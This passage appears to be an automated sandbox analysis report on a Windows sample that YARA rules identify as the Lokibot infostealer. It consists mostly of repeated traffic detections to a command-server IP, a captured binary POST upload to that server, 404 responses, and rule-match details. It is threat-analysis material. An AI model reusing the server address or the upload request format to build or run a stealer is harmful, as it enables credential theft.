                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00404ED4 recv,0_2_00404ED4
                          Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 188Connection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:51:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 09 Dec 2024 07:53:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: 0yWVteGq5T.exeString found in binary or memory: http://www.ibsensoftware.com/

                          System Summary

                          barindex
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                          Source: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                          Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_0040549C0_2_0040549C
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_004029D40_2_004029D4
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: String function: 0041219C appears 45 times
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: String function: 00405B6F appears 41 times
                          Source: 0yWVteGq5T.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 0yWVteGq5T.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
